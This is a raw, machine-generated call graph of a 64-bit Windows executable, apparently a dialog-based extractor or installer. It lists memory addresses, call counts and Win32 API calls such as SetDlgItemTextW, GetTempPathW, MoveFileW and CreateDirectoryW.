7ff63739129c 33 API calls 26357->26360 26359 7ff6373ada98 48 API calls 26358->26359 26365 7ff6373bc6ec BuildCatchObjectHelperInternal 26359->26365 26362 7ff6373bc807 26360->26362 26361 7ff637391fa0 31 API calls 26363 7ff6373bc783 26361->26363 26364 7ff637391150 33 API calls 26362->26364 26366 7ff63739250c SetDlgItemTextW 26363->26366 26367 7ff6373bc822 26364->26367 26365->26319 26365->26361 26366->26350 26777 7ff63739e164 33 API calls 2 library calls 26367->26777 26369 7ff6373bc839 26370 7ff637391fa0 31 API calls 26369->26370 26371 7ff6373bc845 BuildCatchObjectHelperInternal 26370->26371 26372 7ff637391fa0 31 API calls 26371->26372 26373 7ff6373bc87f 26372->26373 26374 7ff637391fa0 31 API calls 26373->26374 26375 7ff6373bc88c 26374->26375 26375->26327 26376 7ff637391fa0 31 API calls 26375->26376 26377 7ff6373bc8f3 26376->26377 26378 7ff63739250c SetDlgItemTextW 26377->26378 26379 7ff6373bc907 26378->26379 26379->26383 26778 7ff6373ba2cc 10 API calls _handle_error 26379->26778 26381 7ff6373bc932 26382 7ff6373aaae0 48 API calls 26381->26382 26384 7ff6373bc93c 26382->26384 26383->26218 26383->26298 26383->26299 26383->26345 26385 7ff6373ada98 48 API calls 26384->26385 26387 7ff6373bc959 BuildCatchObjectHelperInternal 26385->26387 26386 7ff637391fa0 31 API calls 26388 7ff6373bc9f0 26386->26388 26387->26338 26387->26386 26389 7ff63739250c SetDlgItemTextW 26388->26389 26389->26383 26391 7ff6373925d0 26390->26391 26392 7ff63739256a 26390->26392 26391->26049 26392->26391 26779 7ff6373aa4ac 26392->26779 26394 7ff63739258f 26394->26391 26395 7ff6373925a4 GetDlgItem 26394->26395 26395->26391 26396 7ff6373925b7 26395->26396 26396->26391 26397 7ff6373925be SetWindowTextW 26396->26397 26397->26391 26399 7ff637392334 26398->26399 26400 7ff6373922fc 26398->26400 26878 7ff6373923f8 GetWindowTextLengthW 26399->26878 26403 7ff63739129c 33 API calls 26400->26403 26402 7ff63739232a BuildCatchObjectHelperInternal 26404 7ff637391fa0 31 API calls 26402->26404 26408 7ff637392389 26402->26408 26403->26402 26404->26408 26405 7ff6373923c8 26406 7ff6373c2320 _handle_error 8 API calls 26405->26406 26407 7ff6373923dd 26406->26407 26407->26077 26407->26215 26407->26314 26408->26405 26409 7ff6373923f0 26408->26409 26410 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26409->26410 26411 7ff6373923f5 26410->26411 26413 7ff637398d34 26412->26413 26414 7ff637398de8 26412->26414 26417 7ff637398d91 26413->26417 26418 7ff637398de3 26413->26418 26420 7ff637398d42 BuildCatchObjectHelperInternal 26413->26420 26923 7ff637392004 33 API calls std::_Xinvalid_argument 26414->26923 26417->26420 26421 7ff6373c21d0 33 API calls 26417->26421 26922 7ff637391f80 33 API calls 3 library calls 26418->26922 26420->26096 26421->26420 26426 7ff6373befb0 26422->26426 26423 7ff6373befd7 26424 7ff6373c2320 _handle_error 8 API calls 26423->26424 26425 7ff6373bb537 26424->26425 26436 7ff6373aaae0 26425->26436 26426->26423 26924 7ff63739bd0c 33 API calls 26426->26924 26428 7ff6373bf02a 26429 7ff637391150 33 API calls 26428->26429 26430 7ff6373bf03f 26429->26430 26432 7ff637391fa0 31 API calls 26430->26432 26434 7ff6373bf04f BuildCatchObjectHelperInternal 26430->26434 26431 7ff637391fa0 31 API calls 26433 7ff6373bf076 26431->26433 26432->26434 26435 7ff637391fa0 31 API calls 26433->26435 26434->26431 26435->26423 26437 7ff6373aaaf3 26436->26437 26925 7ff6373a9774 26437->26925 26440 7ff6373aab58 LoadStringW 26441 7ff6373aab86 26440->26441 26442 7ff6373aab71 LoadStringW 26440->26442 26443 7ff6373ada98 26441->26443 26442->26441 26944 7ff6373ad874 26443->26944 26446 7ff6373bf0a4 26978 7ff6373bae1c PeekMessageW 26446->26978 26449 7ff6373bf0f5 26453 7ff6373bf101 ShowWindow SendMessageW SendMessageW 26449->26453 26450 7ff6373bf143 SendMessageW SendMessageW 26451 7ff6373bf1a4 SendMessageW 26450->26451 26452 7ff6373bf189 26450->26452 26454 7ff6373bf1c3 26451->26454 26455 7ff6373bf1c6 SendMessageW SendMessageW 26451->26455 26452->26451 26453->26450 26454->26455 26456 7ff6373bf1f3 SendMessageW 26455->26456 26457 7ff6373bf218 SendMessageW 26455->26457 26456->26457 26458 7ff6373c2320 _handle_error 8 API calls 26457->26458 26459 7ff6373bb578 26458->26459 26459->26149 26461 7ff6373a309d 26460->26461 26468 7ff6373a2f8e 26460->26468 26462 7ff6373c2320 _handle_error 8 API calls 26461->26462 26463 7ff6373a30b3 26462->26463 26463->26175 26463->26176 26464 7ff6373a3077 26464->26461 26465 7ff6373a3684 56 API calls 26464->26465 26465->26461 26466 7ff63739129c 33 API calls 26466->26468 26468->26464 26468->26466 26469 7ff6373a30c8 26468->26469 26983 7ff6373a3684 26468->26983 26470 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26469->26470 26471 7ff6373a30cd 26470->26471 26473 7ff6373a7fcf 26472->26473 26474 7ff6373a7fd2 SetCurrentDirectoryW 26472->26474 26473->26474 26474->26191 26476 7ff637394255 26475->26476 26477 7ff63739426a 26476->26477 26478 7ff63739129c 33 API calls 26476->26478 26479 7ff6373c2320 _handle_error 8 API calls 26477->26479 26478->26477 26480 7ff6373942a1 26479->26480 26481 7ff637393c84 26480->26481 26482 7ff637393cab 26481->26482 27116 7ff63739710c 26482->27116 26484 7ff637393cbb BuildCatchObjectHelperInternal 26484->26231 26486 7ff637391fb3 26485->26486 26487 7ff637391fdc 26485->26487 26486->26487 26488 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26486->26488 26487->26245 26489 7ff637392000 26488->26489 26492 7ff6373a216a 26490->26492 26491 7ff6373a219e 26494 7ff6373a227f 26491->26494 26495 7ff6373a6a0c 49 API calls 26491->26495 26492->26491 26493 7ff6373a21b1 CreateFileW 26492->26493 26493->26491 26496 7ff6373a22af 26494->26496 26499 7ff6373920b0 33 API calls 26494->26499 26498 7ff6373a2209 26495->26498 26497 7ff6373c2320 _handle_error 8 API calls 26496->26497 26500 7ff6373a22c4 26497->26500 26501 7ff6373a2246 26498->26501 26502 7ff6373a220d CreateFileW 26498->26502 26499->26496 26500->26272 26500->26273 26501->26494 26503 7ff6373a22d8 26501->26503 26502->26501 26504 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26503->26504 26505 7ff6373a22dd 26504->26505 26507 7ff6373a2066 26506->26507 26508 7ff6373a2072 26506->26508 26507->26508 27128 7ff6373a20d0 26507->27128 27135 7ff6373baa08 26510->27135 26512 7ff6373bd1ee 26513 7ff637391fa0 31 API calls 26512->26513 26514 7ff6373bd1f7 26513->26514 26515 7ff6373c2320 _handle_error 8 API calls 26514->26515 26517 7ff6373bbc2b 26515->26517 26516 7ff6373ad22c 33 API calls 26659 7ff6373bcf03 BuildCatchObjectHelperInternal 26516->26659 26517->26280 26518 7ff6373beefa 27268 7ff63739704c 47 API calls BuildCatchObjectHelperInternal 26518->27268 26521 7ff63739129c 33 API calls 26521->26659 26522 7ff6373bef00 27269 7ff63739704c 47 API calls BuildCatchObjectHelperInternal 26522->27269 26524 7ff6373beeee 26527 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26524->26527 26525 7ff6373bef06 26529 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26525->26529 26528 7ff6373beef4 26527->26528 27267 7ff63739704c 47 API calls BuildCatchObjectHelperInternal 26528->27267 26531 7ff6373bef0c 26529->26531 26533 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26531->26533 26534 7ff6373bef12 26533->26534 26539 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26534->26539 26535 7ff6373bee4a 26536 7ff6373beed2 26535->26536 26540 7ff6373920b0 33 API calls 26535->26540 27265 7ff637391f80 33 API calls 3 library calls 26536->27265 26537 7ff6373913a4 33 API calls 26542 7ff6373bdc3a GetTempPathW 26537->26542 26538 7ff6373beee8 27266 7ff637392004 33 API calls std::_Xinvalid_argument 26538->27266 26543 7ff6373bef18 26539->26543 26541 7ff6373bee77 26540->26541 27264 7ff6373babe8 33 API calls 3 library calls 26541->27264 26542->26659 26552 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26543->26552 26544 7ff6373a62dc 35 API calls 26544->26659 26548 7ff6373cbb8c 43 API calls 26548->26659 26550 7ff6373bee8d 26558 7ff637391fa0 31 API calls 26550->26558 26561 7ff6373beea4 BuildCatchObjectHelperInternal 26550->26561 26551 7ff637392520 SetWindowTextW 26551->26659 26555 7ff6373bef1e 26552->26555 26562 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26555->26562 26556 7ff6373be7f3 26556->26536 26556->26538 26560 7ff6373c21d0 33 API calls 26556->26560 26573 7ff6373be83b BuildCatchObjectHelperInternal 26556->26573 26557 7ff637398d04 33 API calls 26557->26659 26558->26561 26559 7ff637391fa0 31 API calls 26559->26536 26560->26573 26561->26559 26564 7ff6373bef24 26562->26564 26563 7ff6373baa08 33 API calls 26563->26659 26571 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26564->26571 26566 7ff6373bef6c 27272 7ff637392004 33 API calls std::_Xinvalid_argument 26566->27272 26567 7ff6373920b0 33 API calls 26567->26659 26569 7ff637391fa0 31 API calls 26569->26535 26570 7ff6373bef78 27274 7ff637392004 33 API calls std::_Xinvalid_argument 26570->27274 26576 7ff6373bef2a 26571->26576 26572 7ff6373a3f30 54 API calls 26572->26659 26577 7ff6373920b0 33 API calls 26573->26577 26616 7ff6373beb8f 26573->26616 26574 7ff6373bef72 27273 7ff637391f80 33 API calls 3 library calls 26574->27273 26582 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26576->26582 26583 7ff6373be963 26577->26583 26580 7ff6373bef66 27271 7ff637391f80 33 API calls 3 library calls 26580->27271 26581 7ff6373bec2a 26581->26566 26581->26580 26591 7ff6373bec72 BuildCatchObjectHelperInternal 26581->26591 26598 7ff6373c21d0 33 API calls 26581->26598 26602 7ff6373bed3b BuildCatchObjectHelperInternal 26581->26602 26588 7ff6373bef30 26582->26588 26590 7ff6373bef60 26583->26590 26597 7ff63739129c 33 API calls 26583->26597 26586 7ff6373bed40 26586->26570 26586->26574 26586->26602 26606 7ff6373c21d0 33 API calls 26586->26606 26603 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26588->26603 26589 7ff6373a3d34 51 API calls 26589->26659 27270 7ff63739704c 47 API calls BuildCatchObjectHelperInternal 26590->27270 27178 7ff6373bf4e0 26591->27178 26593 7ff6373bd5e9 GetDlgItem 26599 7ff637392520 SetWindowTextW 26593->26599 26595 7ff6373b99c8 31 API calls 26595->26659 26596 7ff63739e164 33 API calls 26596->26659 26604 7ff6373be9a6 26597->26604 26598->26591 26605 7ff6373bd608 SendMessageW 26599->26605 26602->26569 26607 7ff6373bef36 26603->26607 27260 7ff6373ad22c 26604->27260 26605->26659 26606->26602 26613 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26607->26613 26610 7ff6373a5b60 53 API calls 26610->26659 26611 7ff637392674 31 API calls 26611->26659 26612 7ff6373adc2c 33 API calls 26612->26659 26615 7ff6373bef3c 26613->26615 26614 7ff6373bd63c SendMessageW 26614->26659 26620 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26615->26620 26616->26581 26616->26586 26623 7ff6373bef54 26616->26623 26625 7ff6373bef5a 26616->26625 26624 7ff6373bef42 26620->26624 26622 7ff63739129c 33 API calls 26648 7ff6373be9d1 26622->26648 26626 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26623->26626 26630 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26624->26630 26628 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26625->26628 26626->26625 26628->26590 26629 7ff637394228 33 API calls 26629->26659 26633 7ff6373bef48 26630->26633 26631 7ff6373a5820 33 API calls 26631->26659 26632 7ff6373a32a8 51 API calls 26632->26659 26634 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26633->26634 26637 7ff6373bef4e 26634->26637 26635 7ff6373a5aa8 33 API calls 26635->26659 26636 7ff63739250c SetDlgItemTextW 26636->26659 26641 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26637->26641 26639 7ff637391150 33 API calls 26639->26659 26641->26623 26643 7ff637392034 33 API calls 26643->26659 26644 7ff637391fa0 31 API calls 26644->26648 26645 7ff637391fa0 31 API calls 26645->26659 26647 7ff6373b13c4 CompareStringW 26647->26648 26648->26616 26648->26622 26648->26633 26648->26637 26648->26644 26648->26647 26652 7ff6373ad22c 33 API calls 26648->26652 26649 7ff6373bdf99 EndDialog 26649->26659 26651 7ff6373a32bc 51 API calls 26651->26659 26652->26648 26653 7ff6373bdb21 MoveFileW 26654 7ff6373bdb70 26653->26654 26655 7ff6373bdb55 MoveFileExW 26653->26655 26656 7ff637391fa0 31 API calls 26654->26656 26654->26659 26655->26654 26656->26654 26657 7ff6373a2f58 56 API calls 26657->26659 26659->26512 26659->26516 26659->26518 26659->26521 26659->26522 26659->26524 26659->26525 26659->26528 26659->26531 26659->26534 26659->26535 26659->26537 26659->26543 26659->26544 26659->26548 26659->26551 26659->26555 26659->26556 26659->26557 26659->26563 26659->26564 26659->26567 26659->26572 26659->26576 26659->26588 26659->26589 26659->26595 26659->26596 26659->26607 26659->26610 26659->26611 26659->26612 26659->26614 26659->26615 26659->26624 26659->26629 26659->26631 26659->26632 26659->26635 26659->26636 26659->26639 26659->26643 26659->26645 26659->26649 26659->26651 26659->26653 26659->26657 27139 7ff6373b13c4 CompareStringW 26659->27139 27140 7ff6373ba440 26659->27140 27216 7ff6373acfa4 35 API calls _invalid_parameter_noinfo_noreturn 26659->27216 27217 7ff6373b95b4 33 API calls Concurrency::cancel_current_task 26659->27217 27218 7ff6373c0684 31 API calls _invalid_parameter_noinfo_noreturn 26659->27218 27219 7ff63739df4c 47 API calls BuildCatchObjectHelperInternal 26659->27219 27220 7ff6373ba834 33 API calls _invalid_parameter_noinfo_noreturn 26659->27220 27221 7ff6373b9518 33 API calls 26659->27221 27222 7ff6373babe8 33 API calls 3 library calls 26659->27222 27223 7ff6373a7368 33 API calls 2 library calls 26659->27223 27224 7ff6373a4088 33 API calls 26659->27224 27225 7ff6373a65b0 33 API calls 3 library calls 26659->27225 27226 7ff6373a72cc 26659->27226 27230 7ff637391744 33 API calls 4 library calls 26659->27230 27231 7ff6373a31bc 26659->27231 27245 7ff6373a3ea0 FindClose 26659->27245 27246 7ff6373b13f4 CompareStringW 26659->27246 27247 7ff6373b9cd0 47 API calls 26659->27247 27248 7ff6373b87d8 51 API calls 3 library calls 26659->27248 27249 7ff6373bab54 33 API calls _handle_error 26659->27249 27250 7ff6373a7df4 26659->27250 27258 7ff6373a5b08 CompareStringW 26659->27258 27259 7ff6373a7eb0 47 API calls 26659->27259 26661 7ff6373bf9a3 26660->26661 26662 7ff6373920b0 33 API calls 26661->26662 26664 7ff6373bf9b9 26662->26664 26663 7ff6373bf9ee 27288 7ff63739e34c 26663->27288 26664->26663 26665 7ff6373920b0 33 API calls 26664->26665 26665->26663 26667 7ff6373bfa4b 27308 7ff63739e7a8 26667->27308 26671 7ff6373bfa61 26672 7ff6373c2320 _handle_error 8 API calls 26671->26672 26673 7ff6373bbc52 26672->26673 26673->26295 28438 7ff6373b849c 26675->28438 26678 7ff6373bf4b7 26681 7ff6373c2320 _handle_error 8 API calls 26678->26681 26679 7ff6373bf3c7 GetWindow 26680 7ff6373bf3e2 26679->26680 26680->26678 26683 7ff6373bf3ee GetClassNameW 26680->26683 26685 7ff6373bf417 GetWindowLongPtrW 26680->26685 26686 7ff6373bf496 GetWindow 26680->26686 26682 7ff6373bbe9b 26681->26682 26682->26057 26682->26058 28443 7ff6373b13c4 CompareStringW 26683->28443 26685->26686 26687 7ff6373bf429 SendMessageW 26685->26687 26686->26678 26686->26680 26687->26686 26688 7ff6373bf445 GetObjectW 26687->26688 28444 7ff6373b8504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26688->28444 26690 7ff6373bf461 28445 7ff6373b84cc 26690->28445 28449 7ff6373b8df4 16 API calls _handle_error 26690->28449 26693 7ff6373bf479 SendMessageW DeleteObject 26693->26686 26695 7ff6373a6300 26694->26695 26700 7ff6373a638d 26694->26700 26696 7ff6373913a4 33 API calls 26695->26696 26697 7ff6373a631b GetCurrentDirectoryW 26696->26697 26698 7ff6373a6341 26697->26698 26699 7ff6373920b0 33 API calls 26698->26699 26701 7ff6373a634f 26699->26701 26700->26072 26701->26700 26702 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26701->26702 26703 7ff6373a63a9 26702->26703 26705 7ff637392527 26704->26705 26706 7ff63739252a SetWindowTextW 26704->26706 26705->26706 26707 7ff6373fe2e0 26706->26707 26708->26081 26710 7ff637392513 26709->26710 26711 7ff637392516 SetDlgItemTextW 26709->26711 26710->26711 26713 7ff6373912d0 26712->26713 26714 7ff63739139b 26712->26714 26717 7ff637391396 26713->26717 26718 7ff6373912de BuildCatchObjectHelperInternal 26713->26718 26720 7ff637391338 26713->26720 28453 7ff637392004 33 API calls std::_Xinvalid_argument 26714->28453 28452 7ff637391f80 33 API calls 3 library calls 26717->28452 26718->26117 26720->26718 26721 7ff6373c21d0 33 API calls 26720->26721 26721->26718 26722->26142 26724 7ff6373a32bc 51 API calls 26723->26724 26725 7ff6373a32b1 26724->26725 26725->26154 26725->26180 26726->26154 26728 7ff6373913a4 33 API calls 26727->26728 26729 7ff6373a6489 26728->26729 26730 7ff6373a648c GetModuleFileNameW 26729->26730 26733 7ff6373a64dc 26729->26733 26731 7ff6373a64de 26730->26731 26732 7ff6373a64a7 26730->26732 26731->26733 26732->26729 26734 7ff63739129c 33 API calls 26733->26734 26736 7ff6373a6506 26734->26736 26735 7ff6373a653e 26735->26220 26736->26735 26737 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26736->26737 26738 7ff6373a6560 26737->26738 26739->26235 26741 7ff6373920f6 26740->26741 26743 7ff6373920cb BuildCatchObjectHelperInternal 26740->26743 28454 7ff637391474 33 API calls 3 library calls 26741->28454 26743->26259 26744->26270 26745->26282 26746->26291 26747->26297 26748->26306 26750 7ff6373c3620 26749->26750 26750->26310 26751->26224 26753 7ff637391177 26752->26753 26754 7ff637392034 33 API calls 26753->26754 26755 7ff637391185 BuildCatchObjectHelperInternal 26754->26755 26755->26238 26757 7ff637392085 26756->26757 26759 7ff637392059 BuildCatchObjectHelperInternal 26756->26759 28455 7ff6373915b8 33 API calls 3 library calls 26757->28455 26759->26208 26761 7ff6373c2329 26760->26761 26762 7ff6373bc350 26761->26762 26763 7ff6373c2550 IsProcessorFeaturePresent 26761->26763 26764 7ff6373c2568 26763->26764 28456 7ff6373c2744 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 26764->28456 26766 7ff6373c257b 28457 7ff6373c2510 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 26766->28457 28458 7ff6373c783c 31 API calls 2 library calls 26769->28458 26771 7ff6373c791d 28459 7ff6373c7934 16 API calls abort 26771->28459 26774->26264 26775->26329 26776->26354 26777->26369 26778->26381 26804 7ff6373a3e28 26779->26804 26783 7ff6373aa589 26810 7ff6373a9408 26783->26810 26786 7ff6373aa6f2 GetSystemMetrics GetWindow 26791 7ff6373aa821 26786->26791 26803 7ff6373aa71d 26786->26803 26787 7ff6373aa603 26789 7ff6373aa6c2 26787->26789 26790 7ff6373aa60c GetWindowLongPtrW 26787->26790 26788 7ff6373aa519 26788->26783 26801 7ff6373aa56a SetDlgItemTextW 26788->26801 26825 7ff6373a9800 26788->26825 26829 7ff6373a95a8 26789->26829 26793 7ff6373fe2c0 26790->26793 26792 7ff6373c2320 _handle_error 8 API calls 26791->26792 26795 7ff6373aa830 26792->26795 26796 7ff6373aa6aa GetWindowRect 26793->26796 26795->26394 26796->26789 26799 7ff6373aa6e5 SetWindowTextW 26799->26786 26800 7ff6373aa73e GetWindowRect 26800->26803 26801->26788 26802 7ff6373aa800 GetWindow 26802->26791 26802->26803 26803->26791 26803->26800 26803->26802 26805 7ff6373a3e4d _snwprintf 26804->26805 26838 7ff6373c9ef0 26805->26838 26808 7ff6373b0f68 WideCharToMultiByte 26809 7ff6373b0faa 26808->26809 26809->26788 26811 7ff6373a95a8 47 API calls 26810->26811 26813 7ff6373a944f 26811->26813 26812 7ff6373c2320 _handle_error 8 API calls 26814 7ff6373a958e GetWindowRect GetClientRect 26812->26814 26815 7ff63739129c 33 API calls 26813->26815 26823 7ff6373a955a 26813->26823 26814->26786 26814->26787 26816 7ff6373a949c 26815->26816 26817 7ff6373a95a1 26816->26817 26818 7ff63739129c 33 API calls 26816->26818 26819 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26817->26819 26821 7ff6373a9514 26818->26821 26820 7ff6373a95a7 26819->26820 26822 7ff6373a959c 26821->26822 26821->26823 26824 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26822->26824 26823->26812 26824->26817 26826 7ff6373a9840 26825->26826 26828 7ff6373a9869 26825->26828 26877 7ff6373ca270 31 API calls 2 library calls 26826->26877 26828->26788 26830 7ff6373a3e28 swprintf 46 API calls 26829->26830 26831 7ff6373a95eb 26830->26831 26832 7ff6373b0f68 WideCharToMultiByte 26831->26832 26833 7ff6373a9603 26832->26833 26834 7ff6373a9800 31 API calls 26833->26834 26835 7ff6373a961b 26834->26835 26836 7ff6373c2320 _handle_error 8 API calls 26835->26836 26837 7ff6373a962b 26836->26837 26837->26786 26837->26799 26839 7ff6373c9f4e 26838->26839 26840 7ff6373c9f36 26838->26840 26839->26840 26842 7ff6373c9f58 26839->26842 26865 7ff6373cd69c 15 API calls abort 26840->26865 26867 7ff6373c7ef0 35 API calls 2 library calls 26842->26867 26843 7ff6373c9f3b 26866 7ff6373c78e4 31 API calls _invalid_parameter_noinfo_noreturn 26843->26866 26846 7ff6373c2320 _handle_error 8 API calls 26848 7ff6373a3e69 26846->26848 26847 7ff6373c9f69 memcpy_s 26868 7ff6373c7e70 15 API calls _set_fmode 26847->26868 26848->26808 26850 7ff6373c9fd4 26869 7ff6373c82f8 46 API calls 3 library calls 26850->26869 26852 7ff6373c9fdd 26853 7ff6373ca014 26852->26853 26854 7ff6373c9fe5 26852->26854 26856 7ff6373ca06c 26853->26856 26857 7ff6373ca092 26853->26857 26858 7ff6373ca023 26853->26858 26859 7ff6373ca01a 26853->26859 26870 7ff6373cd90c 26854->26870 26860 7ff6373cd90c __free_lconv_mon 15 API calls 26856->26860 26857->26856 26861 7ff6373ca09c 26857->26861 26862 7ff6373cd90c __free_lconv_mon 15 API calls 26858->26862 26859->26856 26859->26858 26864 7ff6373c9f46 26860->26864 26863 7ff6373cd90c __free_lconv_mon 15 API calls 26861->26863 26862->26864 26863->26864 26864->26846 26865->26843 26866->26864 26867->26847 26868->26850 26869->26852 26871 7ff6373cd911 RtlFreeHeap 26870->26871 26875 7ff6373cd941 __free_lconv_mon 26870->26875 26872 7ff6373cd92c 26871->26872 26871->26875 26876 7ff6373cd69c 15 API calls abort 26872->26876 26874 7ff6373cd931 GetLastError 26874->26875 26875->26864 26876->26874 26877->26828 26890 7ff6373913a4 26878->26890 26881 7ff637392494 26882 7ff63739129c 33 API calls 26881->26882 26883 7ff6373924a2 26882->26883 26884 7ff6373924dd 26883->26884 26887 7ff637392505 26883->26887 26885 7ff6373c2320 _handle_error 8 API calls 26884->26885 26886 7ff6373924f3 26885->26886 26886->26402 26888 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26887->26888 26889 7ff63739250a 26888->26889 26891 7ff6373913ad 26890->26891 26899 7ff63739142d GetWindowTextW 26890->26899 26892 7ff6373913ce 26891->26892 26893 7ff63739143d 26891->26893 26897 7ff6373913db memcpy_s 26892->26897 26900 7ff6373c21d0 26892->26900 26910 7ff637392018 33 API calls std::_Xinvalid_argument 26893->26910 26909 7ff63739197c 31 API calls _invalid_parameter_noinfo_noreturn 26897->26909 26899->26881 26903 7ff6373c21db 26900->26903 26901 7ff6373c21f4 26901->26897 26903->26901 26904 7ff6373c21fa 26903->26904 26911 7ff6373cbbc0 26903->26911 26905 7ff6373c2205 26904->26905 26914 7ff6373c2f7c RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 26904->26914 26915 7ff637391f80 33 API calls 3 library calls 26905->26915 26908 7ff6373c220b 26909->26899 26916 7ff6373cbc00 26911->26916 26914->26905 26915->26908 26921 7ff6373cf398 EnterCriticalSection 26916->26921 26922->26414 26924->26428 26932 7ff6373a9638 26925->26932 26928 7ff6373a97d9 26930 7ff6373c2320 _handle_error 8 API calls 26928->26930 26929 7ff6373a9800 31 API calls 26929->26928 26931 7ff6373a97f2 26930->26931 26931->26440 26931->26441 26933 7ff6373a9692 26932->26933 26941 7ff6373a9730 26932->26941 26934 7ff6373b0f68 WideCharToMultiByte 26933->26934 26936 7ff6373a96c0 26933->26936 26934->26936 26935 7ff6373c2320 _handle_error 8 API calls 26937 7ff6373a9764 26935->26937 26938 7ff6373a96ef 26936->26938 26942 7ff6373aaa88 45 API calls _snwprintf 26936->26942 26937->26928 26937->26929 26943 7ff6373ca270 31 API calls 2 library calls 26938->26943 26941->26935 26942->26938 26943->26941 26960 7ff6373ad4d0 26944->26960 26948 7ff6373ad8e5 _snwprintf 26949 7ff6373c9ef0 swprintf 46 API calls 26948->26949 26957 7ff6373ad974 26948->26957 26974 7ff637399d78 33 API calls 26948->26974 26949->26948 26950 7ff6373ad9a3 26952 7ff6373ada17 26950->26952 26954 7ff6373ada3f 26950->26954 26953 7ff6373c2320 _handle_error 8 API calls 26952->26953 26955 7ff6373ada2b 26953->26955 26956 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26954->26956 26955->26446 26958 7ff6373ada44 26956->26958 26957->26950 26975 7ff637399d78 33 API calls 26957->26975 26961 7ff6373ad665 26960->26961 26963 7ff6373ad502 26960->26963 26964 7ff6373acb80 26961->26964 26962 7ff637391744 33 API calls 26962->26963 26963->26961 26963->26962 26966 7ff6373acbb6 26964->26966 26971 7ff6373acc80 26964->26971 26968 7ff6373acc20 26966->26968 26969 7ff6373acc7b 26966->26969 26972 7ff6373acbc6 26966->26972 26968->26972 26973 7ff6373c21d0 33 API calls 26968->26973 26976 7ff637391f80 33 API calls 3 library calls 26969->26976 26977 7ff637392004 33 API calls std::_Xinvalid_argument 26971->26977 26972->26948 26973->26972 26974->26948 26975->26950 26976->26971 26979 7ff6373bae80 GetDlgItem 26978->26979 26980 7ff6373bae3c GetMessageW 26978->26980 26979->26449 26979->26450 26981 7ff6373bae5b IsDialogMessageW 26980->26981 26982 7ff6373bae6a TranslateMessage DispatchMessageW 26980->26982 26981->26979 26981->26982 26982->26979 26984 7ff6373a36b3 26983->26984 26985 7ff6373a36cc CreateDirectoryW 26984->26985 26987 7ff6373a36e0 26984->26987 26985->26987 26988 7ff6373a377d 26985->26988 27003 7ff6373a32bc 26987->27003 26991 7ff6373a378d 26988->26991 27090 7ff6373a3d34 26988->27090 26989 7ff6373a3791 GetLastError 26989->26991 26995 7ff6373c2320 _handle_error 8 API calls 26991->26995 26998 7ff6373a37b9 26995->26998 26996 7ff6373a3720 CreateDirectoryW 26997 7ff6373a373b 26996->26997 26999 7ff6373a3774 26997->26999 27000 7ff6373a37ce 26997->27000 26998->26468 26999->26988 26999->26989 27001 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27000->27001 27002 7ff6373a37d3 27001->27002 27004 7ff6373a32e4 27003->27004 27005 7ff6373a32e7 GetFileAttributesW 27003->27005 27004->27005 27006 7ff6373a32f8 27005->27006 27013 7ff6373a3375 27005->27013 27007 7ff6373a6a0c 49 API calls 27006->27007 27009 7ff6373a331f 27007->27009 27008 7ff6373c2320 _handle_error 8 API calls 27010 7ff6373a3389 27008->27010 27011 7ff6373a3323 GetFileAttributesW 27009->27011 27012 7ff6373a333c 27009->27012 27010->26989 27017 7ff6373a6a0c 27010->27017 27011->27012 27012->27013 27014 7ff6373a3399 27012->27014 27013->27008 27015 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27014->27015 27016 7ff6373a339e 27015->27016 27018 7ff6373a6a4b 27017->27018 27031 7ff6373a6a44 27017->27031 27021 7ff63739129c 33 API calls 27018->27021 27019 7ff6373c2320 _handle_error 8 API calls 27020 7ff6373a371c 27019->27020 27020->26996 27020->26997 27022 7ff6373a6a76 27021->27022 27023 7ff6373a6cc7 27022->27023 27024 7ff6373a6a96 27022->27024 27025 7ff6373a62dc 35 API calls 27023->27025 27028 7ff6373a6ab0 27024->27028 27050 7ff6373a6b49 27024->27050 27026 7ff6373a6ce6 27025->27026 27029 7ff6373a6eef 27026->27029 27034 7ff6373a6d1b 27026->27034 27088 7ff6373a6b44 27026->27088 27054 7ff6373a70ab 27028->27054 27104 7ff63739c098 33 API calls 2 library calls 27028->27104 27033 7ff6373a70cf 27029->27033 27109 7ff63739c098 33 API calls 2 library calls 27029->27109 27030 7ff6373a70b1 27041 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 27030->27041 27031->27019 27115 7ff637392004 33 API calls std::_Xinvalid_argument 27033->27115 27039 7ff6373a70bd 27034->27039 27107 7ff63739c098 33 API calls 2 library calls 27034->27107 27035 7ff6373a70d5 27042 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API 